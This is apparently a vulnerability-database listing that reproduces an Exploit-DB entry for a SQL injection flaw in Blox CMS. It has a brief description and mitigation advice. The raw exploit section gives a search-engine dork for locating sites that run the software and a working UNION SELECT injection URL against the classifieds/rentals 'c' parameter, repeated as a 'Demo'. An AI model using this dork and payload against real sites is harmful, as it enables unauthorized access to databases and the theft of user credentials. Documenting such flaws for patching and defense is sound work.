Blox CMS SQL Injection Vulnerability

vendor:

Blox CMS

by:

CoBRa_21

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Blox CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: a:townnews:blox_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Blox CMS SQL Injection Vulnerability

Blox CMS is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords, or to modify data.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Additionally, input validation should be used to ensure that user-supplied data is valid and does not contain malicious code.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------

Blox CMS SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Script Home: http://bloxcms.com/

Dork: Powered by Blox CMS from TownNews.com

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15


Demo :

http://www.site.com/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15

-------------------------------------------------------------------------------------------